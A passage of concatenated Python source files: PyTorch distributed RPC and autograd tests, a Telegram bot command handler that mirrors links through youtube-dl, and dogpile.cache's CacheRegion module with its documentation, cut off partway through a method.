self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class WrapperModule(nn.Module):
def __init__(self, model, device):
super().__init__()
self.model = model.to(device)
def forward(self, *args):
return self.model(*args)
def gradients(self, ctx_id):
grads = dist_autograd.get_gradients(ctx_id)
return [grads[p] for p in self.model.parameters()]
class TensorPipeCudaDistAutogradTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t1 = torch.rand(10, device=self.rank, requires_grad=True)
t2 = torch.rand(10, device=self.rank, requires_grad=True)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
dist_autograd.backward(context_id, [res.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
return self.next_stage.rpc_sync().forward(input)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeCudaDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeCudaDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = result.sum() * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = result.sum() * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_gradients_synchronizations(self):
options = self.rpc_backend_options
for peer_rank in range(self.world_size):
options.set_device_map(worker_name(peer_rank), {self.rank: peer_rank})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# this is master
layers = [nn.Linear(2000, 2000) for _ in range(self.world_size - 1)]
local_layers = [l.to(0) for l in layers]
remote_layers = []
for rank in range(1, self.world_size):
remote_layers.append(rpc.remote(
worker_name(rank),
WrapperModule,
args=(layers[rank - 1], rank)
))
x = torch.randn(5000, 2000).to(0)
# local iteration
local_model = nn.Sequential(*local_layers)
local_model(x).sum().backward()
# remote iteration
with dist_autograd.context() as context_id:
for remote_layer in remote_layers:
x = remote_layer.rpc_sync().forward(x)
dist_autograd.backward(context_id, [x.sum()])
futs = []
for remote_layer in remote_layers:
futs.append(remote_layer.rpc_async().gradients(context_id))
for i in range(len(futs)):
local_gradients = [p.grad for p in local_layers[i].parameters()]
for g1, g2 in zip(futs[i].wait(), local_gradients):
self.assertEqual(g1, g2)
rpc.shutdown()
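
# ---------------------------------------------------------------------------
# Illustration only (not part of the upstream test suite): a minimal sketch of
# the pattern the tests above exercise. Gradients from a distributed backward
# pass are stored in the autograd context and read via
# dist_autograd.get_gradients(), not via the tensors' .grad fields. The worker
# names, world size, and rendezvous configuration (MASTER_ADDR / MASTER_PORT)
# are assumptions for this sketch.
# ---------------------------------------------------------------------------
def _example_dist_autograd_pattern(rank, world_size):
    import torch
    import torch.distributed.autograd as dist_autograd
    import torch.distributed.rpc as rpc

    rpc.init_rpc(f"worker{rank}", rank=rank, world_size=world_size)
    if rank == 0:
        t1 = torch.rand(3, 3, requires_grad=True)
        t2 = torch.rand(3, 3, requires_grad=True)
        with dist_autograd.context() as context_id:
            # Forward: remote add on worker1, loss reduced locally.
            res = rpc.rpc_sync("worker1", torch.add, args=(t1, t2))
            loss = res.sum()
            # Backward: gradients accumulate in the context.
            dist_autograd.backward(context_id, [loss])
            grads = dist_autograd.get_gradients(context_id)
            assert torch.equal(grads[t1], torch.ones(3, 3))
    rpc.shutdown()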
|
watch.py
|
from telegram.ext import CommandHandler, run_async
from telegram import Bot, Update
from bot import Interval, DOWNLOAD_DIR, DOWNLOAD_STATUS_UPDATE_INTERVAL, dispatcher, LOGGER
from bot.helper.ext_utils.bot_utils import setInterval
from bot.helper.telegram_helper.message_utils import update_all_messages, sendMessage, sendStatusMessage
from .mirror import MirrorListener
from bot.helper.mirror_utils.download_utils.youtube_dl_download_helper import YoutubeDLHelper
from bot.helper.telegram_helper.bot_commands import BotCommands
from bot.helper.telegram_helper.filters import CustomFilters
import threading
def _watch(bot: Bot, update: Update, args: list, isTar=False):
try:
link = args[0]
except IndexError:
msg = f"/{BotCommands.WatchCommand} [yt_dl supported link] [quality] to mirror with youtube_dl.\n\n"
msg += "Example of quality :- audio, 144, 360, 720, 1080.\nNote :- Quality is optional"
sendMessage(msg, bot, update)
return
try:
qual = args[1]
if qual != "audio":
qual = f'best[height<={qual}]/bestvideo[height<={qual}]+bestaudio'
except IndexError:
qual = "best/bestvideo+bestaudio"
reply_to = update.message.reply_to_message
if reply_to is not None:
tag = reply_to.from_user.username
else:
tag = None
listener = MirrorListener(bot, update, isTar, tag)
ydl = YoutubeDLHelper(listener)
threading.Thread(target=ydl.add_download,args=(link, f'{DOWNLOAD_DIR}{listener.uid}', qual)).start()
sendStatusMessage(update, bot)
if len(Interval) == 0:
Interval.append(setInterval(DOWNLOAD_STATUS_UPDATE_INTERVAL, update_all_messages))
@run_async
def watchTar(update, context):
_watch(context.bot, update, context.args, True)
def watch(update, context):
_watch(context.bot, update, context.args)
mirror_handler = CommandHandler(BotCommands.WatchCommand, watch,
pass_args=True,
filters=CustomFilters.authorized_chat | CustomFilters.authorized_user)
tar_mirror_handler = CommandHandler(BotCommands.TarWatchCommand, watchTar,
pass_args=True,
filters=CustomFilters.authorized_chat | CustomFilters.authorized_user)
dispatcher.add_handler(mirror_handler)
dispatcher.add_handler(tar_mirror_handler)
|
region.py
|
from __future__ import with_statement
import datetime
from functools import partial
from functools import wraps
from numbers import Number
import threading
import time
from decorator import decorate
from . import exception
from .api import CachedValue
from .api import NO_VALUE
from .backends import _backend_loader
from .backends import register_backend # noqa
from .proxy import ProxyBackend
from .util import function_key_generator
from .util import function_multi_key_generator
from .. import Lock
from .. import NeedRegenerationException
from ..util import coerce_string_conf
from ..util import compat
from ..util import memoized_property
from ..util import NameRegistry
from ..util import PluginLoader
value_version = 1
"""An integer placed in the :class:`.CachedValue`
so that new versions of dogpile.cache can detect cached
values from a previous, backwards-incompatible version.
"""
class RegionInvalidationStrategy(object):
"""Region invalidation strategy interface
Implement this interface and pass implementation instance
to :meth:`.CacheRegion.configure` to override default region invalidation.
Example::
class CustomInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._soft_invalidated = None
self._hard_invalidated = None
def invalidate(self, hard=None):
if hard:
self._soft_invalidated = None
self._hard_invalidated = time.time()
else:
self._soft_invalidated = time.time()
self._hard_invalidated = None
def is_invalidated(self, timestamp):
return ((self._soft_invalidated and
timestamp < self._soft_invalidated) or
(self._hard_invalidated and
timestamp < self._hard_invalidated))
def was_hard_invalidated(self):
return bool(self._hard_invalidated)
def is_hard_invalidated(self, timestamp):
return (self._hard_invalidated and
timestamp < self._hard_invalidated)
def was_soft_invalidated(self):
return bool(self._soft_invalidated)
def is_soft_invalidated(self, timestamp):
return (self._soft_invalidated and
timestamp < self._soft_invalidated)
The custom implementation is injected into a :class:`.CacheRegion`
at configure time using the
:paramref:`.CacheRegion.configure.region_invalidator` parameter::
region = CacheRegion()
region = region.configure(region_invalidator=CustomInvalidationStrategy()) # noqa
Invalidation strategies that wish to have access to the
:class:`.CacheRegion` itself should construct the invalidator given the
region as an argument::
class MyInvalidator(RegionInvalidationStrategy):
def __init__(self, region):
self.region = region
# ...
# ...
region = CacheRegion()
region = region.configure(region_invalidator=MyInvalidator(region))
.. versionadded:: 0.6.2
.. seealso::
:paramref:`.CacheRegion.configure.region_invalidator`
"""
def invalidate(self, hard=True):
"""Region invalidation.
:class:`.CacheRegion` propagated call.
The default invalidation system works by setting
a current timestamp (using ``time.time()``) to consider all older
timestamps effectively invalidated.
"""
raise NotImplementedError()
def is_hard_invalidated(self, timestamp):
"""Check timestamp to determine if it was hard invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in hard mode.
"""
raise NotImplementedError()
def is_soft_invalidated(self, timestamp):
"""Check timestamp to determine if it was soft invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in soft mode.
"""
raise NotImplementedError()
def is_invalidated(self, timestamp):
"""Check timestamp to determine if it was invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time.
"""
raise NotImplementedError()
def was_soft_invalidated(self):
"""Indicate the region was invalidated in soft mode.
:return: Boolean. True if region was invalidated in soft mode.
"""
raise NotImplementedError()
def was_hard_invalidated(self):
"""Indicate the region was invalidated in hard mode.
:return: Boolean. True if region was invalidated in hard mode.
"""
raise NotImplementedError()
class DefaultInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._is_hard_invalidated = None
self._invalidated = None
def invalidate(self, hard=True):
self._is_hard_invalidated = bool(hard)
self._invalidated = time.time()
def is_invalidated(self, timestamp):
return self._invalidated is not None and timestamp < self._invalidated
def was_hard_invalidated(self):
return self._is_hard_invalidated is True
def is_hard_invalidated(self, timestamp):
return self.was_hard_invalidated() and self.is_invalidated(timestamp)
def was_soft_invalidated(self):
return self._is_hard_invalidated is False
def is_soft_invalidated(self, timestamp):
return self.was_soft_invalidated() and self.is_invalidated(timestamp)
class CacheRegion(object):
r"""A front end to a particular cache backend.
:param name: Optional, a string name for the region.
     This isn't used internally,
     but can be accessed via the ``.name`` attribute, which is helpful
for configuring a region from a config file.
:param function_key_generator: Optional. A
function that will produce a "cache key" given
a data creation function and arguments, when using
the :meth:`.CacheRegion.cache_on_arguments` method.
The structure of this function
should be two levels: given the data creation function,
return a new function that generates the key based on
the given arguments. Such as::
def my_key_generator(namespace, fn, **kw):
fname = fn.__name__
def generate_key(*arg):
return namespace + "_" + fname + "_".join(str(s) for s in arg)
return generate_key
region = make_region(
function_key_generator = my_key_generator
).configure(
"dogpile.cache.dbm",
expiration_time=300,
arguments={
"filename":"file.dbm"
}
)
The ``namespace`` is that passed to
:meth:`.CacheRegion.cache_on_arguments`. It's not consulted
outside this function, so in fact can be of any form.
For example, it can be passed as a tuple, used to specify
arguments to pluck from \**kw::
def my_key_generator(namespace, fn):
def generate_key(*arg, **kw):
return ":".join(
[kw[k] for k in namespace] +
[str(x) for x in arg]
)
return generate_key
Where the decorator might be used as::
@my_region.cache_on_arguments(namespace=('x', 'y'))
def my_function(a, b, **kw):
return my_data()
.. seealso::
:func:`.function_key_generator` - default key generator
        :func:`.kwarg_function_key_generator` - optional key generator that also
uses keyword arguments
:param function_multi_key_generator: Optional.
Similar to ``function_key_generator`` parameter, but it's used in
:meth:`.CacheRegion.cache_multi_on_arguments`. Generated function
should return list of keys. For example::
def my_multi_key_generator(namespace, fn, **kw):
namespace = fn.__name__ + (namespace or '')
def generate_keys(*args):
return [namespace + ':' + str(a) for a in args]
return generate_keys
:param key_mangler: Function which will be used on all incoming
keys before passing to the backend. Defaults to ``None``,
in which case the key mangling function recommended by
the cache backend will be used. A typical mangler
is the SHA1 mangler found at :func:`.sha1_mangle_key`
which coerces keys into a SHA1
hash, so that the string length is fixed. To
disable all key mangling, set to ``False``. Another typical
mangler is the built-in Python function ``str``, which can be used
to convert non-string or Unicode keys to bytestrings, which is
needed when using a backend such as bsddb or dbm under Python 2.x
in conjunction with Unicode keys.
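
     For illustration, a region whose keys are all run through the SHA1
     mangler might be configured as follows (a minimal sketch; the choice
     of the ``dogpile.cache.memory`` backend here is arbitrary)::

        from dogpile.cache import make_region
        from dogpile.cache.util import sha1_mangle_key

        region = make_region(key_mangler=sha1_mangle_key).configure(
            "dogpile.cache.memory"
        )
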
:param async_creation_runner: A callable that, when specified,
will be passed to and called by dogpile.lock when
there is a stale value present in the cache. It will be passed the
     mutex and is responsible for releasing that mutex when finished.
This can be used to defer the computation of expensive creator
functions to later points in the future by way of, for example, a
background thread, a long-running queue, or a task manager system
like Celery.
For a specific example using async_creation_runner, new values can
be created in a background thread like so::
import threading
def async_creation_runner(cache, somekey, creator, mutex):
''' Used by dogpile.core:Lock when appropriate '''
def runner():
try:
value = creator()
cache.set(somekey, value)
finally:
mutex.release()
thread = threading.Thread(target=runner)
thread.start()
region = make_region(
async_creation_runner=async_creation_runner,
).configure(
'dogpile.cache.memcached',
expiration_time=5,
arguments={
'url': '127.0.0.1:11211',
'distributed_lock': True,
}
)
Remember that the first request for a key with no associated
value will always block; async_creator will not be invoked.
However, subsequent requests for cached-but-expired values will
still return promptly. They will be refreshed by whatever
asynchronous means the provided async_creation_runner callable
implements.
By default the async_creation_runner is disabled and is set
to ``None``.
.. versionadded:: 0.4.2 added the async_creation_runner
feature.
"""
def __init__(
self,
name=None,
function_key_generator=function_key_generator,
function_multi_key_generator=function_multi_key_generator,
key_mangler=None,
async_creation_runner=None,
):
"""Construct a new :class:`.CacheRegion`."""
self.name = name
self.function_key_generator = function_key_generator
self.function_multi_key_generator = function_multi_key_generator
self.key_mangler = self._user_defined_key_mangler = key_mangler
self.async_creation_runner = async_creation_runner
self.region_invalidator = DefaultInvalidationStrategy()
def configure(
self,
backend,
expiration_time=None,
arguments=None,
_config_argument_dict=None,
_config_prefix=None,
wrap=None,
replace_existing_backend=False,
region_invalidator=None,
):
"""Configure a :class:`.CacheRegion`.
The :class:`.CacheRegion` itself
is returned.
:param backend: Required. This is the name of the
:class:`.CacheBackend` to use, and is resolved by loading
the class from the ``dogpile.cache`` entrypoint.
:param expiration_time: Optional. The expiration time passed
to the dogpile system. May be passed as an integer number
of seconds, or as a ``datetime.timedelta`` value.
         .. versionadded:: 0.5.0
``expiration_time`` may be optionally passed as a
``datetime.timedelta`` value.
The :meth:`.CacheRegion.get_or_create`
method as well as the :meth:`.CacheRegion.cache_on_arguments`
decorator (though note: **not** the :meth:`.CacheRegion.get`
method) will call upon the value creation function after this
time period has passed since the last generation.
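
         For illustration (a minimal sketch; the backend and the one-hour
         timeout are arbitrary)::

            import datetime

            region.configure(
                "dogpile.cache.memory",
                expiration_time=datetime.timedelta(hours=1),
            )
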
:param arguments: Optional. The structure here is passed
directly to the constructor of the :class:`.CacheBackend`
in use, though is typically a dictionary.
:param wrap: Optional. A list of :class:`.ProxyBackend`
classes and/or instances, each of which will be applied
in a chain to ultimately wrap the original backend,
so that custom functionality augmentation can be applied.
.. versionadded:: 0.5.0
.. seealso::
:ref:`changing_backend_behavior`
:param replace_existing_backend: if True, the existing cache backend
will be replaced. Without this flag, an exception is raised if
a backend is already configured.
.. versionadded:: 0.5.7
:param region_invalidator: Optional. Override default invalidation
strategy with custom implementation of
:class:`.RegionInvalidationStrategy`.
.. versionadded:: 0.6.2
"""
if "backend" in self.__dict__ and not replace_existing_backend:
raise exception.RegionAlreadyConfigured(
"This region is already "
"configured with backend: %s. "
"Specify replace_existing_backend=True to replace."
% self.backend
)
try:
backend_cls = _backend_loader.load(backend)
except PluginLoader.NotFound:
raise exception.PluginNotFound(
"Couldn't find cache plugin to load: %s" % backend
)
if _config_argument_dict:
self.backend = backend_cls.from_config_dict(
_config_argument_dict, _config_prefix
)
else:
self.backend = backend_cls(arguments or {})
if not expiration_time or isinstance(expiration_time, Number):
self.expiration_time = expiration_time
elif isinstance(expiration_time, datetime.timedelta):
self.expiration_time = int(
compat.timedelta_total_seconds(expiration_time)
)
else:
raise exception.ValidationError(
"expiration_time is not a number or timedelta."
)
if not self._user_defined_key_mangler:
self.key_mangler = self.backend.key_mangler
self._lock_registry = NameRegistry(self._create_mutex)
if getattr(wrap, "__iter__", False):
for wrapper in reversed(wrap):
self.wrap(wrapper)
if region_invalidator:
self.region_invalidator = region_invalidator
return self
def wrap(self, proxy):
""" Takes a ProxyBackend instance or class and wraps the
attached backend. """
# if we were passed a type rather than an instance then
# initialize it.
if type(proxy) == type:
proxy = proxy()
if not issubclass(type(proxy), ProxyBackend):
raise TypeError(
"Type %s is not a valid ProxyBackend" % type(proxy)
)
self.backend = proxy.wrap(self.backend)
def _mutex(self, key):
return self._lock_registry.get(key)
class _LockWrapper(object):
"""weakref-capable wrapper for threading.Lock"""
def __init__(self):
self.lock = threading.Lock()
def acquire(self, wait=True):
return self.lock.acquire(wait)
def release(self):
self.lock.release()
def _create_mutex(self, key):
mutex = self.backend.get_mutex(key)
if mutex is not None:
return mutex
else:
return self._LockWrapper()
# cached value
_actual_backend = None
@property
def actual_backend(self):
"""Return the ultimate backend underneath any proxies.
The backend might be the result of one or more ``proxy.wrap``
applications. If so, derive the actual underlying backend.
.. versionadded:: 0.6.6
"""
if self._actual_backend is None:
_backend = self.backend
while hasattr(_backend, "proxied"):
_backend = _backend.proxied
self._actual_backend = _backend
return self._actual_backend
def invalidate(self, hard=True):
"""Invalidate this :class:`.CacheRegion`.
The default invalidation system works by setting
a current timestamp (using ``time.time()``)
representing the "minimum creation time" for
a value. Any retrieved value whose creation
time is prior to this timestamp
is considered to be stale. It does not
affect the data in the cache in any way, and is
**local to this instance of :class:`.CacheRegion`.**
.. warning::
The :meth:`.CacheRegion.invalidate` method's default mode of
operation is to set a timestamp **local to this CacheRegion
in this Python process only**. It does not impact other Python
processes or regions as the timestamp is **only stored locally in
memory**. To implement invalidation where the
timestamp is stored in the cache or similar so that all Python
processes can be affected by an invalidation timestamp, implement a
custom :class:`.RegionInvalidationStrategy`.
Once set, the invalidation time is honored by
the :meth:`.CacheRegion.get_or_create`,
:meth:`.CacheRegion.get_or_create_multi` and
:meth:`.CacheRegion.get` methods.
The method supports both "hard" and "soft" invalidation
options. With "hard" invalidation,
:meth:`.CacheRegion.get_or_create` will force an immediate
regeneration of the value which all getters will wait for.
With "soft" invalidation, subsequent getters will return the
"old" value until the new one is available.
Usage of "soft" invalidation requires that the region or the method
is given a non-None expiration time.
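
        As a brief illustration of the two call forms::

            region.invalidate()            # hard: all getters regenerate
            region.invalidate(hard=False)  # soft: stale value served until
                                           # the new value is generated
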
.. versionadded:: 0.3.0
:param hard: if True, cache values will all require immediate
regeneration; dogpile logic won't be used. If False, the
creation time of existing values will be pushed back before
the expiration time so that a return+regen will be invoked.
.. versionadded:: 0.5.1
"""
self.region_invalidator.invalidate(hard)
def configure_from_config(self, config_dict, prefix):
"""Configure from a configuration dictionary
and a prefix.
Example::
local_region = make_region()
memcached_region = make_region()
# regions are ready to use for function
# decorators, but not yet for actual caching
# later, when config is available
myconfig = {
"cache.local.backend":"dogpile.cache.dbm",
"cache.local.arguments.filename":"/path/to/dbmfile.dbm",
"cache.memcached.backend":"dogpile.cache.pylibmc",
"cache.memcached.arguments.url":"127.0.0.1, 10.0.0.1",
}
local_region.configure_from_config(myconfig, "cache.local.")
memcached_region.configure_from_config(myconfig,
"cache.memcached.")
"""
config_dict = coerce_string_conf(config_dict)
return self.configure(
config_dict["%sbackend" % prefix],
expiration_time=config_dict.get(
"%sexpiration_time" % prefix, None
),
_config_argument_dict=config_dict,
_config_prefix="%sarguments." % prefix,
wrap=config_dict.get("%swrap" % prefix, None),
replace_existing_backend=config_dict.get(
"%sreplace_existing_backend" % prefix, False
),
)
@memoized_property
def backend(self):
raise exception.RegionNotConfigured(
"No backend is configured on this region."
)
@property
def is_configured(self):
"""Return True if the backend has been configured via the
:meth:`.CacheRegion.configure` method already.
.. versionadded:: 0.5.1
"""
return "backend" in self.__dict__
def get(self, key, expiration_time=None, ignore_expiration=False):
"""Return a value from the cache, based on the given key.
If the value is not present, the method returns the token
``NO_VALUE``. ``NO_VALUE`` evaluates to False, but is separate from
``None`` to distinguish between a cached value of ``None``.
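
        For illustration (``load_value`` is a placeholder for whatever
        produces the real value)::

            value = region.get("some key")
            if value is NO_VALUE:
                value = load_value()
                region.set("some key", value)
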
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionchanged:: 0.3.0
:meth:`.CacheRegion.get` now checks the value's creation time
against the expiration time, rather than returning
the value unconditionally.
The method also interprets the cached value in terms
of the current "invalidation" time as set by
the :meth:`.invalidate` method. If a value is present,
but its creation time is older than the current
invalidation time, the ``NO_VALUE`` token is returned.
Passing the flag ``ignore_expiration=True`` bypasses
the invalidation time check.
.. versionadded:: 0.3.0
Support for the :meth:`.CacheRegion.invalidate`
method.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param expiration_time: Optional expiration time value
which will supersede that configured on the :class:`.CacheRegion`
itself.
.. note:: The :paramref:`.CacheRegion.get.expiration_time`
argument is **not persisted in the cache** and is relevant
only to **this specific cache retrieval operation**, relative to
the creation time stored with the existing cached value.
Subsequent calls to :meth:`.CacheRegion.get` are **not** affected
by this value.
.. versionadded:: 0.3.0
:param ignore_expiration: if ``True``, the value is returned
from the cache if present, regardless of configured
expiration times or whether or not :meth:`.invalidate`
was called.
.. versionadded:: 0.3.0
.. seealso::
:meth:`.CacheRegion.get_multi`
:meth:`.CacheRegion.get_or_create`
:meth:`.CacheRegion.set`
:meth:`.CacheRegion.delete`
"""
if self.key_mangler:
key = self.key_mangler(key)
value = self.backend.get(key)
value = self._unexpired_value_fn(expiration_time, ignore_expiration)(
value
)
return value.payload
def _unexpired_value_fn(self, expiration_time, ignore_expiration):
if ignore_expiration:
return lambda value: value
else:
if expiration_time is None:
expiration_time = self.expiration_time
current_time = time.time()
def value_fn(value):
if value is NO_VALUE:
return value
elif (
expiration_time is not None
and current_time - value.metadata["ct"] > expiration_time
):
return NO_VALUE
elif self.region_invalidator.is_invalidated(
value.metadata["ct"]
):
return NO_VALUE
else:
return value
return value_fn
def get_multi(self, keys, expiration_time=None, ignore_expiration=False):
"""Return multiple values from the cache, based on the given keys.
Returns values as a list matching the keys given.
E.g.::
values = region.get_multi(["one", "two", "three"])
To convert values to a dictionary, use ``zip()``::
keys = ["one", "two", "three"]
values = region.get_multi(keys)
dictionary = dict(zip(keys, values))
Keys which aren't present in the list are returned as
the ``NO_VALUE`` token. ``NO_VALUE`` evaluates to False,
but is separate from
``None`` to distinguish between a cached value of ``None``.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionadded:: 0.5.0
"""
if not keys:
return []
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
backend_values = self.backend.get_multi(keys)
_unexpired_value_fn = self._unexpired_value_fn(
expiration_time, ignore_expiration
)
return [
value.payload if value is not NO_VALUE else value
for value in (
_unexpired_value_fn(value) for value in backend_values
)
]
def get_or_create(
self,
key,
creator,
expiration_time=None,
should_cache_fn=None,
creator_args=None,
):
"""Return a cached value based on the given key.
If the value does not exist or is considered to be expired
based on its creation time, the given
creation function may or may not be used to recreate the value
and persist the newly generated value in the cache.
Whether or not the function is used depends on if the
*dogpile lock* can be acquired or not. If it can't, it means
a different thread or process is already running a creation
function for this key against the cache. When the dogpile
lock cannot be acquired, the method will block if no
previous value is available, until the lock is released and
a new value available. If a previous value
is available, that value is returned immediately without blocking.
If the :meth:`.invalidate` method has been called, and
the retrieved value's timestamp is older than the invalidation
timestamp, the value is unconditionally prevented from
being returned. The method will attempt to acquire the dogpile
lock to generate a new value, or will wait
until the lock is released to return the new value.
.. versionchanged:: 0.3.0
The value is unconditionally regenerated if the creation
time is older than the last call to :meth:`.invalidate`.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param creator: function which creates a new value.
:param creator_args: optional tuple of (args, kwargs) that will be
passed to the creator function if present.
.. versionadded:: 0.7.0
        :param expiration_time: optional expiration time which will override
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
.. note:: The :paramref:`.CacheRegion.get_or_create.expiration_time`
argument is **not persisted in the cache** and is relevant
only to **this specific cache retrieval operation**, relative to
the creation time stored with the existing cached value.
Subsequent calls to :meth:`.CacheRegion.get_or_create` are **not**
affected by this value.
:param should_cache_fn: optional callable function which will receive
the value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
E.g.::
def dont_cache_none(value):
return value is not None
value = region.get_or_create("some key",
create_value,
should_cache_fn=dont_cache_none)
Above, the function returns the value of create_value() if
the cache is invalid, however if the return value is None,
it won't be cached.
.. versionadded:: 0.4.3
.. seealso::
:meth:`.CacheRegion.get`
:meth:`.CacheRegion.cache_on_arguments` - applies
:meth:`.get_or_create` to any function using a decorator.
:meth:`.CacheRegion.get_or_create_multi` - multiple key/value
version
"""
orig_key = key
if self.key_mangler:
key = self.key_mangler(key)
def get_value():
value = self.backend.get(key)
if (
value is NO_VALUE
or value.metadata["v"] != value_version
or self.region_invalidator.is_hard_invalidated(
value.metadata["ct"]
)
):
raise NeedRegenerationException()
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - 0.0001
return value.payload, ct
def gen_value():
if creator_args:
created_value = creator(*creator_args[0], **creator_args[1])
else:
created_value = creator()
value = self._value(created_value)
if not should_cache_fn or should_cache_fn(created_value):
self.backend.set(key, value)
return value.payload, value.metadata["ct"]
if expiration_time is None:
expiration_time = self.expiration_time
if (
expiration_time is None
and self.region_invalidator.was_soft_invalidated()
):
raise exception.DogpileCacheException(
"Non-None expiration time required " "for soft invalidation"
)
if expiration_time == -1:
expiration_time = None
if self.async_creation_runner:
def async_creator(mutex):
if creator_args:
@wraps(creator)
def go():
return creator(*creator_args[0], **creator_args[1])
else:
go = creator
return self.async_creation_runner(self, orig_key, go, mutex)
else:
async_creator = None
with Lock(
self._mutex(key),
gen_value,
get_value,
expiration_time,
async_creator,
) as value:
return value
def get_or_create_multi(
self, keys, creator, expiration_time=None, should_cache_fn=None
):
"""Return a sequence of cached values based on a sequence of keys.
The behavior for generation of values based on keys corresponds
to that of :meth:`.Region.get_or_create`, with the exception that
the ``creator()`` function may be asked to generate any subset of
the given keys. The list of keys to be generated is passed to
``creator()``, and ``creator()`` should return the generated values
as a sequence corresponding to the order of the keys.
The method uses the same approach as :meth:`.Region.get_multi`
and :meth:`.Region.set_multi` to get and set values from the
backend.
If you are using a :class:`.CacheBackend` or :class:`.ProxyBackend`
that modifies values, take note this function invokes
``.set_multi()`` for newly generated values using the same values it
returns to the calling function. A correct implementation of
``.set_multi()`` will not modify values in-place on the submitted
``mapping`` dict.
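
        For illustration (a minimal sketch; ``load_records`` and
        ``lookup_record`` are placeholders, and the creator receives only
        those keys that actually need generation)::

            def load_records(*keys):
                return [lookup_record(key) for key in keys]

            values = region.get_or_create_multi(
                ["record:1", "record:2", "record:3"], load_records
            )
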
:param keys: Sequence of keys to be retrieved.
:param creator: function which accepts a sequence of keys and
returns a sequence of new values.
        :param expiration_time: optional expiration time which will override
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
:param should_cache_fn: optional callable function which will receive
each value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
.. versionadded:: 0.5.0
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
def get_value(key):
value = values.get(key, NO_VALUE)
if (
value is NO_VALUE
or value.metadata["v"] != value_version
or self.region_invalidator.is_hard_invalidated(
value.metadata["ct"]
)
):
# dogpile.core understands a 0 here as
# "the value is not available", e.g.
# _has_value() will return False.
return value.payload, 0
else:
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - 0.0001
return value.payload, ct
def gen_value():
raise NotImplementedError()
def async_creator(key, mutex):
mutexes[key] = mutex
if expiration_time is None:
expiration_time = self.expiration_time
if (
expiration_time is None
and self.region_invalidator.was_soft_invalidated()
):
raise exception.DogpileCacheException(
"Non-None expiration time required " "for soft invalidation"
)
if expiration_time == -1:
expiration_time = None
mutexes = {}
sorted_unique_keys = sorted(set(keys))
if self.key_mangler:
mangled_keys = [self.key_mangler(k) for k in sorted_unique_keys]
else:
